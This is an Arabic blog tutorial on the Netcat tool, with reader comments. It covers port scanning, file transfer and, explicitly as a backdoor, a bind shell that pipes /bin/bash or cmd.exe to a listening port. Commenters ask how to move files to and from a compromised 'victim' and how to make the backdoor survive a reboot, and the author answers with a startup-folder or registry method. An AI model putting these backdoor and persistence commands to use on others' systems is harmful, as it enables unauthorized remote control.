شرح أداة Netcat – The Swiss Army Knife

كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن

السلام عليكم ورحمة الله وبركاته

netcat-logo.png
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools

استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها

فحص المنافذ المفتوحة في السيرفر

تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر

nc -v -w1 SERVER-IP -z FromPort-ToPort

أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ

مثال على ذلك

nc -v -w1 64.233.183.147 -z 1-100

ولفحص أكثر من نطاق منافذ نستعمل الأمر

nc -v -w1 -z 64.233.183.147 -z 1-100 400-500

ملاحظة: 64.233.183.147 هو IP موقع Google

نقل الملفات بين جهازك والسيرفر

من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل

nc SERVER-IP PORT < FILE

ونطبق الأمر في الجهاز المستقبل

nc -l -p PORT > FILE

مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا

nc 192.168.0.45 5555 < data.txt

أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر

nc -l -p 5555 > data.txt

جعل الـ Netcat تعمل كـ Backdoor

هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر

nc -l -p PORT -e PROGRAM

مع اضافة -d و -L في ويندوز ليصبح الأمر

nc -l -p PORT -d -e PROGRAM -L

مثال على هذه الخاصية نقوم بتطبيق الأمر

nc -l -p 4455 -e /bin/bash

على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل

nc -l -p 4455 -e -d cmd.exe -L

وللاتصال بالسيرفر نطبق الأمر

nc -v -n SERVER-IP 4455

وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر

nc -h

تحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز

ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان

أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.

التصنيف: Hacking & Security | عدد المشاهدات 18,715 | عدد التعليقات 52

رابط التعقيبات التعليقات RSS
x

أرسل الى صديق





أرسل الموضوع
twitter del.icio.us digg reddit stumbleupon facebook technorati google yahoo

التعليقات
  1. 16- خالد كتب بتاريخ: 25 Aug 2008 الساعة: 9:16 PM

    وعليكم السلام
    اخوي فعلاً الاداه جميله لكن صعوبتها في الاوامر

    لنفرض مثلن اني اخترق جهاز واحد عن طريق الشل كود

    وقدرت ادخل جهازه بس عندي مشكله وهي كيف ارفع مثلاً باتش لجهاز الضحيه

    وكيف استطيع اخذ ملف من جهازي الضحيه الي جهازي

    واخير مثلن ابي اسحب باتش من النت لحهازي الضحيه

    ياليت تقولي الاوامر !

    ومعليش اذا طولت

  2. 17- Br4v3-H34r7 كتب بتاريخ: 27 Aug 2008 الساعة: 12:49 AM

    أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!

  3. 18- الرومانسي الرقيق كتب بتاريخ: 31 Aug 2008 الساعة: 10:41 PM

    اخوي الغالي اولن مشكور علي هذا البرنامج و الله ما قصرت يا بعد عيني بس عندي سوئل
    1- حبي النظام الباك تراك 3 الفاينل يحتوي علي هذا الادات هي نفس عمل هذا الادات الموجود اهني ام يختلف عمل تلك الادات عن هذة ارجو ان فتهمت قصدي و مشكور مرة اخري الغالي علي هذا البرنامج و ان شاء الله نحو الامام و التقدم و تحياتي اليك و الي الجميع

  4. 19- Br4v3-H34r7 كتب بتاريخ: 01 Sep 2008 الساعة: 12:44 AM

    أخي أجل الأداة هي نفسها الموجودة في توزيعة الباك تراك و حسب معرفتي يوجد أداة netcat واحدة لكن تختلف الاصدارات…

  5. 20- خالد كتب بتاريخ: 11 Sep 2008 الساعة: 10:59 AM

    أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!

    مشكور علي الرد
    تفضل اخوي
    نظام التشغيل وندوز الاستغلال عن طريق الشل كود الصلاحيات لا اعلم كيف اطلعها

    اذا ماعرفت وش الامر الصحيح
    ياليت تضع جميع اوامر النت كات لرفع ملف بجميع الصلاحيات

  6. 21- Br4v3-H34r7 كتب بتاريخ: 11 Sep 2008 الساعة: 1:40 PM

    أخي لاظهار جميع أوامر النت كات استخدم آخر أمر مذكور في الشرح! و الأوامر السابقة تشرح بعض استخدامات النت كات. يعني الأوامر أمامك و أنت تقلي أضعها لك,, شيء غريب!!

  7. 22- SaUdi~Net كتب بتاريخ: 20 Oct 2008 الساعة: 10:43 PM

    جمييييل ،، يآبطل ،، اداه جميله من شخص ارووووع ،،

    تحيآتي لك

  8. 23- عبد الحميد كتب بتاريخ: 20 Nov 2008 الساعة: 8:32 AM

    السلام عليك أخي .. أنا عندي البرنامج .. ولكن لا أعرف أين بالضبط يتم تنفيذ هذه الأوامر التي كتبتها .. حيث أنه لا يوجد خانه لكتابة هذه الأوامر .. اعذرني لجهلي.. ولكن إذا كان فيها تعب ممكن شرح مدعم بالصور لهذه الأوامر .. .. اسف للإطالة ولو الشرح موجود مسبقاً يا ريت تنوه بالإشارة لإسم الموضوع لأبحث عنه.. جزاك الله كل خير … ويا ريت لو يكون في شرح عن الشبكات وأوامر الشبكات .. عاوزين نتعلم حاجة مفيدة بقى

  9. 24- Offensive كتب بتاريخ: 20 Nov 2008 الساعة: 12:46 PM

    How To make it run as a service With windows Machine ?!!

    I mean It run after restart The computer ?!!

  10. 25- Br4v3-H34r7 كتب بتاريخ: 20 Nov 2008 الساعة: 7:42 PM

    @SaUdi~Net: تسلم أخي.. ان شاء الله يكون الموضوع نال اعجابك وأهلا بك في المدونة.

    @عبد الحميد: وعليكم السلام.. أخي الشرح واضح جدا ولايحتاج لصور لتتعلم كيفية تطبيقه!! كل ماعليك هو تنفيذ هذه الأوامر من الـ cmd اذا كان نظامك Windows مع مراعاة تنفيذ الأمر في نفس مجلد البرنامج أو نسخ الأداة لمجلد system32 الموجود داخل النظام.. تحياتي!

    @Offensive: There is a different between run the program as windows service or make it run when windows startup! anyway you can use .bat file and add it to the startup folder or to the registry. please use Arabic language next time!!

  11. 26- knari كتب بتاريخ: 28 Nov 2008 الساعة: 5:45 PM

    الله يوفقك دنيا واخره

    والله افضل مدونه رايتهاااااااااااا

  12. 27- DrEaDFuL كتب بتاريخ: 23 Dec 2008 الساعة: 9:51 PM

    السلام عليكم ورحمة الله وبركاته

    اولا شكرا اخي على الشرح الوافي والتام

    بس عندي سؤال انا حملت الادات تبع الوينداوز ثم وضعتها بsystem32 وعملت امر cmd بس لما اجي اطبق امر nc ياتيني الرد التالي
    Access is denied.
    رجاءا شرح لكيفية تنزبلها على الجهاز ثم تنصيبها ثم الاتصال اذا انا فاهم استعمالها خطا

    وربي يجازيك كل خير

  13. 28- Br4v3-H34r7 كتب بتاريخ: 24 Dec 2008 الساعة: 12:48 AM

    @knari: شكرا أخي على دعواتك الجميلة.. أتمنى أن تكون استفدت من الموضوع وأهلا بك في المدونة.

    @DrEaDFuL: وعليكم السلام أخي.. لا تحتاج لتنصيب الأداة ويمكنك استخدامها بشكل مباشر من cmd بعد وجودك بنفس مسار الأداة دون الحاجة لنسخها لمجلد system32 وبالنسبة لرسالة Access is denied لا أعلم ما السبب بصراحة لكن أظن أنك تعمل على النظام بحساب user وليس Administrator! بالتوفيق…

  14. 29- محمود كتب بتاريخ: 31 Dec 2008 الساعة: 11:44 PM

    :yesبرنامج كتير جميل

  15. 30- ممنوع كتب بتاريخ: 23 Mar 2009 الساعة: 6:27 AM

    تسلم حبيب قلبي

    في إنتظار الشرح

الصفحات: « 1 [2] 3 4 » أظهر جميع التعليقات
المشاركة بتعليق

               


أعلى الصفحة